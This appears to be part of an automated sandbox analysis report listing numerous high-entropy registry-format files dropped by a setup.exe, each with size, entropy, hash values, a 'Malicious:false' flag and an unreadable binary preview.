              Process:C:\Users\user\Desktop\setup.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.980344476253025
              Encrypted:false
              SSDEEP:192:4ZG4SKmuhAeJS5Pl8mbhz8osz/g4Rpnw2BBzltTxqyK:4Z0KmuhAesnjzfE7zNqyK
              MD5:7CB4B792D7FC731A87D4782BCB9BAF49
              SHA1:45244F1D4DD6D5EAD6FF498C5D992A1B00A081CA
              SHA-256:15231D1967C0CA8AD916D7259A7349FCF1F75CB9A0BF56D5DC192813D187B825
              SHA-512:1B237BF1F0E0625FAC2C380841AB6A773522C64237FA51829B16463442004B591EBC64E077AA25B2676FA90E345F119BBC707E156E3A98C456F8B6EBFA2D97B1
              Malicious:false
              Preview:regf....g..K.....3...}n}T.d..O.y... ............$Q.... ..e..L.....}.2".gq.|.%....|..1.ya%.}...r..l.S..6|W.ad.b....`.7.0..R....G-;.......w..."....a.&.6..L..}......i.sD..+.v.d....C.....qb.f........C#?VR.F..8.i+.00..'R.1,..o...^..%.d)W..T.C5.....k..19....._.. 4...}QP..p.....*..:&.....u..d.J..y.t|Q..nQ..V$.pS.#>zC.d..-.$..... L}I.....k$..8..AhX...&...&.^h....i@..>f.....a...K...N..."...d.C.%7...w...W.R...j./Z~&...T.`xn..2.?.|3.....}......$. ..Q3..g..o.X...P..K.}.%3MQ>S.2b.4...\c......xIg.h.".Z..*_$B*.....h...>t...2..x..X......IFm...{.u... z1..k..Y.......................ay....X..h.."^.g.,Ct.c|............54. .+.B.DC..E.q.h.....3.?....V...q..il>.U;.?2..6H......K.M..J.k....r....?...*9|....%...v._.E....karg.BYK.P]..,#....n.h@..@>.n.`..$.X.8.............23a.........}rX&xh.>\...f=..........._..8/+'.6.FdA.4J...t..8.g.r.W).uG.'..4..5....[I...A.*C.@..;{.=F-G2....Wi.6.@..5-..Ua........Q.-....w..).i..... .4 R[[....T..Dv.............0.z.:..s....!f@S.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.974569655621865
              Encrypted:false
              SSDEEP:192:zPV6maU4IgjiYRfhndvGQgNh+k0QQ3j14SEyf72H7T6+8ut5:z8ljiyfhnNGQgCkAj1co72HnPL5
              MD5:097C4B5B0AE91CF5853C5DBE8509C4F1
              SHA1:F920061A23DFE4807B5EC79743F3E6F3A8A01BD0
              SHA-256:D950E6AE88AB28FBD260828AD470EC7C205C61923A36D6ED1B4E90F1DDC7A5C5
              SHA-512:F85B91B436910BA9A99D8DE0CF50FC4030585BECBFE6596804B9CDA53FE0B209341E52B6D4C0B7DA4981C8047FA0BE8ED2EFEC45990C2FD786FFB5ECC1DC0E26
              Malicious:false
              Preview:regf..E...K..`.x.T.......,K.yBZ.."..h.X.'...h~..J/.L..=.-. .9.R.>c.......e.S..RY,..2.......?..U.....].n..MF.b.}k..T..Iw....f..%...Bc.xj.X..%.%O..snc.Gxo......rY..;.....SX....3.6..?..7...%iR...o..w.....f..#4z..Ck.U#3.z.I**.o..w...s.-.]......V..".U.....(_B....@....."*.....;.:_...<.45.......2]o...,w+...s%^.OGZ.m.....B8.....a..R.....T..P.s~.G.1...jm..........1k.E.$S.......2m.q.../.......AE.o.0..n..5-.".......a&..6w2U:Q,.,.-.J0....I;P.......AJI.f.l6].X....A.|...#.O<..4...F..n.#i.1.\n.?.+..g.3......P.[8._..n...1.;.......-MRO.3..x..H....&^@I...).zE...2..aV.1VXj....sf.........d..6..S.\..S..j.\>L.p..6............W...t .ic.>...<@.u..)_4.VY.....p.y....Q7-.3.b.:`(N&.9I...P.n...s.M.<...!{DO..C.[....c5.&...R.....G...F.1.X...u;..w....$..].f.^..kFR...h..y......4.4......T.G..e....s1...Plr....SKc.......n.k.dc......$.p.ux..(x.W=...4..Q...M....R....8....&k#.RGf4....~.x.....=m./....Z........f...l..0....);j_E..6.....t.j...%......wFdQ'..........A].d..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.976632375063587
              Encrypted:false
              SSDEEP:192:Lyn+6siKSoqyQRyFNDg44RWS65LG2oAInCH1BwS0rlv+7lvFeK:Ly+Bi3LyQeNk44AT0Ag6BZavwlNeK
              MD5:1D6CA7290BFEEAB8CE76169A32AD6C35
              SHA1:D2457E42C4D9C391884E07183574E160D4731551
              SHA-256:3404935D07A2C913E16CF4EB567DF8F2CA1803DC4D9306EF41B2C28B0C2B8977
              SHA-512:2C364365A10CEDAEBB1BECA76BB8039BB78DC2C03A7F7D2A1420FCCBCA7F26EA908BFAADE9D51810166A8B606858D8A81823F8D63ADCBEBC6258485D42B8D7B4
              Malicious:false
              Preview:regf....]jLd?1@j..)t~.'V....T..b9..E..~Lp.h8.J...m..kL...#S]t#v.r.5.g.1.:..!..7..........o.+ar..u.zX..!h/..6.........e..N..o2..%........'z.x9.g..8.A.40v3.x..t.B........x..).....<#p.v......rQ......[1..R.-.....kc.zR*.]U...L.._......hz..m..9...Q..h.Q..o..=.9V4)g@h.z..~..R"rH..O..%9....x..=2I;.....*....#..7z...6...K14..V]..]a..(..at.?.Y ...0+..;..&.E.w<I...!.4;.O.;z...Sg>.E...X..;...-;/.O.....y.=A.t.W.I..U.g}.*.qt..........?..f....@..,.w7.[..".....nC.>.lv.....Irw...v.......q..p..N.%..PT!..IQ.C..P....K....... Y.......A.W...p...P..H...u........#y>+..%...%.....A.....j'..Af..=.........\.K..?...kt.7...Ee.z..?4<K+...f...k.hkC?T4..v{.zCOgG.k.E..E...v:.e..!.....:.....>.?8.....q...c..[:D.zlk.......T....-,..=t....W0.M.......%.3*.....V.....a....G........vAyM.F..oU.l."P..d..=...L."......D..:..7..k.D.'-..vF.....5...,.7...}..*|.3.4../.U.....<.=3.gC...%F.MH.za.....r.....(f.-...n.%..<...b.>..3..I...O.R.)...#m..nnP.S......a....$..AR.......
              Process:C:\Users\user\Desktop\setup.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.981211993599146
              Encrypted:false
              SSDEEP:192:U2Z/0iR0BDdJlS4IHsjLSSXLhWFKn0OeAtD+s7bnyjx:UQUDlS44sfbX0OeAB+yyV
              MD5:0FC8EC0C385F13A15D5A2D99B1FFDA05
              SHA1:D283DE449C3E8F442A1E067B8CB8AA9C88005BD9
              SHA-256:A91396FF1802F61578EAD7032B20493EFDB1CD1188513A5FE9D8CC0EBA904DC6
              SHA-512:4F1431CCF9CC19D17DBCF6D2550DA8191B01504D551C43857FEA1FEB694F5F56071D063BCE31BDF3B8A8BAF5AB37CCAD4C0F95FDD78AA6A3445C746967A048BB
              Malicious:false
              Preview:regf......<.A...(.k.X....-..s...a.+..wb...X.V[...).o..$X..If(.2i_.I!>..s%..0.a...^8._.d.....73A.Q....k-....;..Et.a.a.y|....v;.B....I9ldh:e..I. .Q...^yTYd..xJhI..*.h......#..a;9Z3.g.4..k..9.Z.(..).)...4......a...[.u*....l..V!d.l|9.s....]Y..*$.............{....B..T.DC....?.. -+.q.-.+i,.W.>.:U..%..t.yq..... C.._.t*...>...b.?S....7...?..........~4.$mk".x._.ed.yN..Yu8...:..)v.......j.o...*+H.*..,...cg.....n...T..%..v..`e$...C....M..i....l.&-b1.T.F.......>."L..ks.....FZF...D..W......[.^_...M.+`."...7\..p.._p......WP.]2..B..:..>y.ar..t#..0KhS.b':.$.atA..U...*t...:].....o..g.L.,....>Sl.t..R.o.@...-.....$.F.|....{b.*#.....0...F.Q!w..h...)...Y..}M..O7.b]~.84..r..#u..cm..O..a".3..f..C.B_37..Q...,......L.0j...qa~S[.E...!mML.8...U...PRzmo..N1..<.&H....M..5...K..=f..U.S...W...._....# ..pW......6...kl..b.E........7..:}...ch...C..\.J..3w.*..sx..d.`.J.0H.M.^Z~.s..B...yZ\.....b.~,M>......\G...="..Y..._0.w\l.P....k...l.m..C*.SY@..58.;.....`..B...x(..t..p.=.#.7
              Process:C:\Users\user\Desktop\setup.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.979216377979341
              Encrypted:false
              SSDEEP:192:gHZPgGhwtYvu+/L0FoJU2kZo/PWzeMrbu2itp/d8xg5NdUgO:gmGhaD+/vJv8oWzJrbul/RNE
              MD5:C45DB3D02699A7989B4D4BB8FF6C3D47
              SHA1:2E3CCB524CC3B7A898BB87185DDC4002E25EA561
              SHA-256:8B4475BE9A1F93BF2D257CA1108B1918812FC06EBFD56AEC26B9C7B0CAA1D465
              SHA-512:0CE80454E2D0DEE31E3E573218F1E61B594165F279A592A5431158514E2DB6EB05F5FBE1341CC6B156E78A178249888D9CBA3221DEDFC425D6A5C9760AEF4D64
              Malicious:false
              Preview:regf.o.,0....p.,.?.-.*.._3.}....O+}r....b.....e.XR..w.}...#.0.Kv=..=.k.v...b.jy..6..:.S.9Y....qR.p;uP%...{..o..\.......pG...;\.d.!.....=..'...h...\.4*...........f.b.(...M.........=...:..t........L....x.M....(w.U..z.A.AJ?s5.p.Y}F.."....sq%x../......^(....'l.{....y> L6.b.G.|.4I>..Z..i.'.B.CZ.P...;.SW{#t.$..e..M.......x=lEx..f...x...dW.%W....K..1e.f.b,...%.~u....@[X.?5Mv..`^....._..._.] ...S.:.3^@.R..:..R.)Y.y..?..W.C(.y.1.....8.]....a..mK....g.|.g(.g.....Y..a,.;.....KHpk-.\b#vb.`...Ob.C".'.7ii.....m.(.u...YDX...R..J.W...or.?..^.H....f..RD...&R.Y....oG&.r...":....x.).J...s..:+..v...M....#.+.Y..A5...0..qk..Q...Ti.g......r......7.ZG..=1>.XLj..Y&H.-..1...J.C?...)...#.b.F].Fo.;......0..7.u...rg..v....k0.}Zf.x...;...e:*.......,0.c5........QR$..evh..d|.P...O..Kc.7..H.t..A.+8%.....m..{.9..=1......T_.)..s?.s.....@B5...d.3.S.vZ..R?B,....M....p>............t..y.B..".eL...xp....#o.c?.P..A.YO.7L2}...v..0..k.....9.,;.m.,...6.....Q.vw....|
              Process:C:\Users\user\Desktop\setup.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.979896034363837
              Encrypted:false
              SSDEEP:192:YjQu1pR8Jd8CQWe3XZm42hi52KHusV1l95jhKXIyzW:YJ1D8Jdrec42452HsVr9Xx
              MD5:205E4D622C0713E589FE62BEE581DED8
              SHA1:DF7F30ADE71B8BFB338B70429C80B51CB45D93C8
              SHA-256:32D37CB6B17443A84C2DBB8D63030001E97BF343C1627390AD27969112121C59
              SHA-512:701E569CE359229154139B074BF83441030171A64C3D150842A49571AADB6D245C6D6E8100E2A61D2BF84C25AE4DEE89D721CB529B3FFAE9AFCC90AFE47A66AB
              Malicious:false
              Preview:regf...u~OY...._%.AR%.....A..uez7..:.kb..."...VV.......a.h..C.?..y-.....Q......E.Q.9.S3.Lo.....`H....... ..%Y...g.......?..E....+..sq$8..7'.V.!.)i..B".>v....tQ.`]...^p..Z..g;F.8..gq.m...lo...@._.]...4i..N..a.....0#.......rPL..O.C.X?.."..q.........Mh)....n.......P.g.%.B........W.M.Q/.q....F.?...~.\..'|.2.?.Ji/......YP....m2].R...&?#%C....1...$\..U.'{...Q.{..K[c..|.EY...D..U,>..A%#.~...O...1O2....Rl...<.qy.c..y.....X..}......K..BvU.........z.m.y.S&..&......O.7...f/5.X..%.>..<n=.Kb.r.j].3.?...oHl.y@3^.7+...1.......Mb..N...#|.$.....b.._\.w.(.6F...c#.4Au...Z.Vrs .I{j8....0>..n..&..C....hT|...s..$.*M}@..)........5...\T_..Y$.C...FA+a..A..i......S%e...h..l.8CjS1....<...<..M..S...w.l.\..o.....z~....l.'}e....I...`0...%..t.X.@6.tAr.G..5..J..C..iaz:.P...jd...RJ. ....6...;y....|.2:.W..Xt1.@*.?.}..|l.v|2a<....'.9...*..^\..f.....v..]....Hd?! ..n....="...QF....._..b....lLxg.~.....4.;ZO.....Q..j....{..v.....w...^.{....@.}.R..Z7/.....2.....
              Process:C:\Users\user\Desktop\setup.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.980803176438192
              Encrypted:false
              SSDEEP:192:VUIjO5QG9/aDSDRVukyvOQgf2wovGLfvebGSIeEvqg:Vxq5QG9vVujIvL3QGSIey
              MD5:4BCD4877B4752712DDA3B843A604DEFB
              SHA1:1709058045B682AD9AA1D7BDCCC3BFCC0B9DA60B
              SHA-256:66C45134B3F4E475FD1F611983129E8A84DC4F263B48DDF86A9A35EA3FD9E30F
              SHA-512:D604AF7267780E6DF213E5B73962A6FB36ED27153AB4BBCD80C2E5B286BD6B17A6374AFCB28D457453644455040C74D7D980FBA6C896AE837913F3974ABE8DA6
              Malicious:false
              Preview:regf....X.Tv...m.=.E...h.S...r.W....Nx...m.oU.7.....".&..1.q.@1..(I.....{.T.....8.]...w..5. d.!....:...h.3.m&4..7K^.o..^.$....u.W...?...ls.Z.....A.Y.*,.H.F...|.#..L/_.-WG0Cm..Jb.8.x<..z.wc.....3.....B.W. ...n<7..J>..J.:....n.zn...jIM..W.........59.e..x.>...m*...l~@[..<.we.c...r8.Z1..'.q.L..O.W {.w.s...4.{....G..._....mb...4.bZ.km.s..)o.E..u-."..w..!.......y....8.39.!...?..L.F.$..6..s..]...-(_.3V-l...Q%..+....*...}...SO..-L]o......K}g.]7.f{u.........z..H......M-c9.p.U$./.....[w.N.\.G..K.).:...|.n..k...D......;.R..z....o,...Y...-K.H..+.|^...W...R2.`.....k%P&.?..4.H^.9..~.{.;^68h.l.\.f.Ne......j.../.ICP..Z.~AB=*..L.....,..B1.........&..i..JK........>..D|g...kS.Io..kG.l^...k6c.h.........)w).d,...y"....i.K.D...O~.c..>....\8.z7.h.i|Z..OA8.^e.e8M..zWci^.F........:Sf..!...`ug.....I.[.:V.p...AE7.s....v4...%.;mD.:.a;.8.]....^.z..-..f.k....2.j5n^.L).*5. ..?.h....?......ac%.,7...Z..H.3..d~..?@.x.....r........|..Mr.-..k....#.Lq8..9.o..I..4.4...1...s.y_...G
              Process:C:\Users\user\Desktop\setup.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.974832240825216
              Encrypted:false
              SSDEEP:192:wcGZ7TClmfNDUMYEZYDwlSsY12mAQEzqFxii5:wtEkfBUvTDASTAQEzqFxii5
              MD5:3652504107F5542AA3AFC43BDFE824D6
              SHA1:5AF1971D2CCCBF473D3985A2C6392880CF6150E1
              SHA-256:32107FBDEC2F9083D405E4C8C9B7C472630D67677FBFB715E26ECCFC3ED06766
              SHA-512:584351EC7CF3D4DFEFF3CFC9FAA9DB2685F87CF32DBECCCD231EDB5BC58D46828F5D05B596A6D86FB24E41CB0F7C4BD2F10D786D8FD2DA1E7E38115370A88BC4
              Malicious:false
              Preview:regf..fyL+..^.c..u..b.....]J........^.~.G..k...S.}.q..XU..(...r.0/.u_...c....T*I.K.....OR....ih.X...."%}..L.....K....H].2.R._kO..Z.vK.:..~..whJ......A........u.Z.-`jqT.......F."(.....=.p...$.%...<.3...Ep{....?i.+.g._.F?....Qh)C....-.Ws.p...[..n...+d/.....|.,...P4.)j.Vd...."....W..R\%..xyH.....^/......gp...z..K.'*v]....pd..w.8..-..[.Nh.K.e....oX/........!.MB.ffD.J._*eflU..^....N...w..q..|5...)Eg.d.......`9A.l..:v...B.....xJ*..8..6/.U...j.x......z.. .qh..@k...w &.;...J...A^KT..<.s.......h.f..5..q.Qg._....b..D!q..M:F(..../.U....AO<O'.R=.A."3..G..Tv..6t.u..3.@d.CHn..D..}.v..1.i...d...R>K.\..(.L..W.ls..'...+...aw..'.>.6d..K.'[K...`.)<.....(..|...p....2l.r(........+5.-@.....&].l.KE..}.p.2.%..:..{...19....5r2.....PK{1.Q.BW.5..E..7,3.W....V.-r.XDA1*.S.ZZR..a}k.S..T.c...t..{....@..T..Y..}g..lN....m~...Y....U..>....]...]wc\-..k.N.n.G.Ew~9....+..w_O L...;[kY.&.5..1...D>..%......C2..:2.Q&.;..aN'...B....+....U./..IQ~......k.fj.BE.C.......^....k.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.981237552329535
              Encrypted:false
              SSDEEP:192:uCEXEx+mozLHSmGi22UtKaZAPg2KEJIdLzmr0lbxpA9YtIK1caLWDm:MXE8RzLHSmGi2VZACEJIAr0lbLA4caaq
              MD5:F7A1A9AF96FC6B094DF48ABA45123C3B
              SHA1:D041045AC1FE0E7724F99E44B1A3E9670E9F31C3
              SHA-256:176B10C19CDBF6BBA13080312312EED234D65F50741A12CC74773D202C11B307
              SHA-512:10444B5B4BC13E89C3141EC8307E4D44D26BA8FA3F739657EF2066F217D01FED6A33CDB4D104C203628CB417CD348482C2F0FFBC7ADD1BDE5CAFE920F8086EDD
              Malicious:false
              Preview:regf.wz ......TC..[.o+.n.*.F6.NOK.(;..c....'\.vL...EI.....`E..Nk.....@.....Q..n.z.....Cg..pJ.S.&...T.F....9.;...D....Aw......qX..pt]1.{..K.*..... z......`,@,..%/......q.G..*..H]%.....:.g........+.....F.O..|...#v.(e.....m....tO..p.+.....O}.....g...~.(.3F...3.K.N.&y......P....k..x..-n....{.\.*R.. D.&)..).O....e4.?...|...Xb6..A ..rs.....^....^8.t$........!2.p..u.y...GAi.f..[X..}...{.a.~R...W.;H!...FH..y...b.C...c@.... .4._ D?....0.......`....'........$.T.XT.<.E..e8f.f...8...X5).;...J..=o.N..@~i..Q>.Y#Ej..7.Fs.q..d.......].....p.q...4U_...rb.Y...[|S1:.........r.c6bl...)..!.0.....5T.v.^....)u]@.k.....n,.hgM.n......7..,..`y..Z...c@..#......}.H..".%..{{.|.f...}Q.U.fK.j...g.].A.q..(`.y.....9}<....Q....Mr.6.BvU...A$?.D......+.(.}.....5.c..g@D&.qg..F~....mqQ..+....@l[..G..O....y.&..M;6.F..$....B)..`.......}..-5.........^...l..e....1..2G.f...C.~.p...Cg...67..........p..r.q[.f.....&W8C..^.%"...._..a?.G>S..6J.m....U~p..{......g.........H....?.'.....
              Process:C:\Users\user\Desktop\setup.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.976546866192708
              Encrypted:false
              SSDEEP:192:gxFUFxsQiEqHu2qoU8ssQJDsHPu8+lfBFN+RRjE+KtoyPy0C3Z:wFUlf2qXsQJqB+X+jE+QnCp
              MD5:28DFC53F97E581C93DD8BD882505E22C
              SHA1:9B9D8C462F6D5959BF44212FB2E578C74442048E
              SHA-256:22AC2B5E462A70DC290CD5502A425DE7BCC67161662FE1859779D4E2D390CC2A
              SHA-512:100F0DB3E2559E9DD1EE5907C927840DB60A7DC3056D85E8264B7978FCD0CDCB5B65F7FD708F2CFD3E0B0B829BA500ED8F8477A745C451C853917031855F4E4A
              Malicious:false
              Preview:regf.D..w....!..~g.<......1.x...&8..W~.......ra.R..q[...u........E.h..$.o..qf.."'.k.-..T.}_+.~;..#...].vE...I.~..8.l.@.)..........j...!~...Y...9...y.....D\_.9K...F../.9......7H.9S..y.i.~xY.+..Z...iBR.'.h.=....K..6..r.@i./...RvV.Y.&. .2pG.....m..F..S.!......z?..8......Q.....?....+.....X.W...j....+p....G...l. #.2..ga...O..?Z.....*..|M..)..}.i....d..wl..V......$...Y....AL .z.*H.}!.N;k.R.w.5.6R...Ld8.<DW .=..jI.8.mJ.mX.0...3.x...5,h.|.........n.....Ap9P....x.`.T...F..-.+*...`o...6o'3.P...p.$.Iym..lX..(q?.F.K..D..T.)........i.x^......S).#0.....L{J.l..&.(...qV..%...{-.l.a&.#s*.5_..B.$....Ec.k.=-....Y.6.....,.-.\.Jj..\!....".Mx..(...1yZ8.%....<.L.y$p^....$O....r.I....t.... O....#...hZD%..U.@%.1.E....r.".....Rz..F.5L&.N..qkz3{.*h?;(.2.9(.GA..AyR...!.....u....ne.`...!..N8r.S.|6U~IR.s.Q...u...{..JF-........Z.r...+..X.^.1...sK5f.}IM.J!.O...|.....[...K)...FXW..b? .#..$.f...W8.,l.U>......r....u>..H..&..6kW.%...B.W.'..eJ<...h....+w......{..uW...2
              Process:C:\Users\user\Desktop\setup.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.977974987629936
              Encrypted:false
              SSDEEP:192:B5P9AzwW1m+yDsXn2y3GagWGYz9CP1Tp/6gSs3:X9/7DwB3eYz9CP15D3
              MD5:42C5FB61A48B72449BC56843DEEA42CD
              SHA1:6F000A4DF0FDBDCA3A585789A175E8CB8744241F
              SHA-256:0CDFDC579562C320DCC586E8F06C6FDBA7058DDDFA1DDA5B8E9B12F89FE960F0
              SHA-512:8F0CC14D16A1E4813C6B531E1EE0C854EDC663193D5AF40C0DBE70440BF5D58D391497C7F0A361F46E3C0932C736A9A9F813F23E9112EBDEF5F97CF5FD2D22AD
              Malicious:false
              Preview:regf.. ....N......p.Zf.6U.M..8H.y...M...;+G.(.5M.q...2.iS....d....j.3;...G. >.MS.$Owh...H....v..<..:.Bb....N....%..s..d#Q..._..T.$}L?.Kp..M.=..'.GWo....l...?X]......2qNEdx.Q...*.....M...z.... \,.Z.CK.a.j.....tVN/.....e.6..3...<...\?]A./.z.AKp.N]..).kHi@.T/w...p u.v7s."..}.y..................G.9:..f......tBf........u..VW.U.. D..."vr..< ]$Ts...I.(b-.>......._..t.f.o.=.z..G..]....A..i+..b2H.cF...ey..{[MV...........yN.#4..._.[Ho...Hws....>./.z......9..ln.5a..j/.....b+....[..~..p...W/.&C4.....+.Ga......`...N.R.....Yj=I5.9......i.C...SO..&...&9c..,..?E...u.w.WOt(....P.D..........v.j..,0..%..o;/.....vT.dT.A....a..NY...=..|..r.g.e........R ..\.F..J.S.O................d$...ep....'q.Fk_..j.\.6...3.?.....-$...).....3r...t|"..yq....r}.>.z.@...(......._.....?.K...jz.s..Q...V.*Q...4H.IL.l...Y..n.......kF....Z.]..Z!z...g..=<... i._o.\....<.Ab.[.#..^.]....s...j..\.)..k)m...d]..&3.\.+p....sR.$v$sqk..C.... ....:o..q.D.=a..z..n.]. .HI.J...I.@.Z...I.w....o..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.9785638877539125
              Encrypted:false
              SSDEEP:192:bvlU7uoty3mEeBNko5/OUDCK0S1sE4v4vsICN/n4d6OFA7p/isdQfussb4et:bvlUSotwm3Bmo5/OUDB/48snN/n4oOFS
              MD5:7E5CCF2EA5CC81236E4415EEAB22FCBD
              SHA1:592BBECA32BA8E7B923B42A740181A6728E6CBDD
              SHA-256:AB779A1554502081E8991B6D83A1BF21682A6EC4FCD73B2CC0D75CEC8A6A1B11
              SHA-512:CF4685FBF26C55BD6111929D0552484E43ECFCD15C5BB9E3E0A0B0E41C5F02EFD097D2ABBBE339B0E65A4B8AADA6C3FA132C86A61CAC0F2A70701AA2644AF7F8
              Malicious:false
              Preview:regf....Y...d..7cH.......4~..K.c.......{..:..<...T........+>*.....`.B.i.$.......7..l?....B..$...r....2..o."..)...t...9....9'..8.X._>........cn....UsC-...2/.....g{;....&.o...|..2.JD\F..g...().J..4.VZ3.Q.t.4u...{w.D..1..[.%..I...-.*.mN_.^..........,Z....a..!.?..C.v....^..n....G..1..,..$D..FBv...(.#Y....F|..........].-.=.h..Y...z[.v.....p..x..Xj..........m.|..m.Fd...}.)..1.my.y...`...~.e(.....D(X0?Zr.*(.v.8%......1.7..)...W...>.31c.:v."...Ob.apYStX.j..M.KC@......L.iI......*$. .9......S..6X.........v..].N..x.,(.7("Fg9.{"&k.+.h.,.+..Q.)*iw.[..x @..U*!\........w+.............z...L..&3..&($s...!\....q(..j..J..a..m..N0........R.3d.h.r...%J.mb..N.u)..{.;-..R#..j..t.D.Y...gI..%.X.9?....IR.o.,..\1-.8......$...Z...sH.....(..z..:....\........X..sI..(t..&..c,.>........U..d....E..1A...:G.Z*<e....%}"o._&..=W\WuJ.{e9.`D..|ht#^.....s.3.d.~.[.h..j.......1......p..`...M....r...J..9.n@._..^.Q...[..8.O7u..*..#..|:....aXqS..m./.O...z.....@3'......q.|.....n.|`...i...
              Process:C:\Users\user\Desktop\setup.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.978791990174601
              Encrypted:false
              SSDEEP:192:M+DbInCJENSnuje4ngKCDDtyNUan3fbks2tazXq:7DbICJENSnuje4g3Dtja3fbNN2
              MD5:5B15622A7C70CD34F3F29DCA0188006C
              SHA1:C070199D72BF59965FCDF46B50A97DA7C21E90CF
              SHA-256:DAD548F8ED4A7F35754C99A84F0B37F84806BD2FAF4213F06D66017BC4FDE52A
              SHA-512:78D53133EB338A81B540C5C4019FBE4F326316A6B871B523815872792EAD445FE1522324CFE18023194B9BBD6DED92CCE30CB263C4DA15DA148EBA74349BB87B
              Malicious:false
              Preview:regf.E."5<J...D.i.jY.S}"..m.:u..tU~.a........ws...V....).^.^;;4.......~."F....`S.V..JdL.R.m._.@.?...a..G.y.%.?m.G.Z..=..n/.ztm:mj......ymo..!^...VG....`...k..>6Z'.......4.4.<..6..UvxY.r...\R.B.Q..#yV..o.v..Gl..R...u..b.3PC...:.....j.~s.....#..6....pI..#Q..@.fC.\.O.V...R^..+...,.k.6....~...7...yGdl.(.......8p..rO.].8......F.T.W..lw....L*xF'.-m.U-f...&{......oca.T.....O...~B.s.....#FSO.....S...K...}.9Rw...c:.@,.K...m(..'.W.(..._..]'..4..qo8.... 7..cX.|t]C.'...[.1..yJuQ../t.x..!...xO..n.M.b.q.7.........c...rAB.r...!z.q.eN.K.....s.............q).%`.0.>.!.-.I..vo...9..z......i.P..1K"ko...rV*.O...'....m..O.ez.\........0..:..4/w.#.......Z..X.3.c.t.......tb..tt...h`.~e..z),t.;#w.%n.D7....{gD.......Z...^.V.zK.<..z...k..tU6.....;....c.Tv.. %<-......[....... y.^=..v...dTh..>Bz..(h....R.r%.G....1..C..b..j.j.%....Z..K.o..c.D..i...s0.c...m..p.>....X.~.J`...>F..H..l..._>Y.S...e&.\...........w>s#...C.j.[..F....s.'.e......y.YI.....i(...
              Process:C:\Users\user\Desktop\setup.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.979867929015553
              Encrypted:false
              SSDEEP:192:646RuUcCY2Pf27/7mQKoeWmHAqyLidPgWM7Xm:aRdzY2W7Th8Z1RMTm
              MD5:018C9C7CAC1A968C58825D6E6075B6AF
              SHA1:B75E9A619AEE592FBD509B310E3CDCE48B86284F
              SHA-256:9107121CAF8F91E36A9E2A4C5357B8EE60DD625F8926BE80563938CEC23AE904
              SHA-512:FC7EBCAA55489C699C43FE5578A1FEEE17A79B0883B4607C6D27660790D9966EB2D856D7C8E46ABB1CBBBA43DA0DE113E3E036138767439671C5EA34BFA008E1
              Malicious:false
              Preview:regf.i........i$x.Z......f..'{.2.....I......"..}..v...t.8...UZ.r$....vG.cp.... /C..Z;..U.A.B...s.|.-I.'1r..7..Dk...'.Z........\..<.F....\AUl..........1.......nO..M..W.4.Yoz.....l......`.3s.Fl.?if.....qmO;u.@........F?.......Y6.".@P.&.......=c....Er.N.Vs.............yb'M!..q{..=./=.c."4.WCM...$l...z.q..,=n.y.ym.e.65\.R)......L=/.Y.....Z...Qne..!...5.I9...q.........v...]zL.n..I(...#%....'_oA.zh..K4..$..*S...K.....*.r...C.`.......3."Z.G..*....6qD..dyh.L...s;..?.............X&!..(.-.J.W.C.......Jd....g.b.C......4.....k.x..|4....}(. L.5..Tp.X.....T..t.4.i.O..9.~...fO.J...@.......P.s.{yWs.{.H..'...q..E..A....k.t.c[..^>AV\H..7<...mD.I....\z7....=4.x.Q`...Fq.NQ@./cXT.1..../.}.yI?)...C.........5.h.O+~.4..}...{px....*....R...8..^Mi...tq.N....M..P.X..(O....r...w.$. .!Iz...=....`|..6(....sm........w.h...'5...F...J....e.d...0:|...R..(.f.....JR&.6.Md.R...[..f..IW....L.6(*:\....G......t.ME.'...e..2..@_..L.A.N..i.k..NL.!...........M.....]..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.976413303126992
              Encrypted:false
              SSDEEP:192:2NVnGbKZvCIlAjNkk1jwTSd8RQbLWQp8hQ88Hrcw03OEC:QnG0CIOjNP1kTLQ3W9qfrw5C
              MD5:153AA7F9029DC7082A104D73688A042F
              SHA1:192369399A632C30210596D4492917FBF0386818
              SHA-256:4DC15350A25E00929679CDD74B2FD8B26BC7AC1E8A4792618BA3E975F7105CAC
              SHA-512:A08D80ABA7CD20AFE6C663062149056121FC84A613623C5C80E6CE162F1D326EB4CC51CD1FB7070BB7C83E2074922A6F43D38CD6088D92D876942C4A9B8B5BF7
              Malicious:false
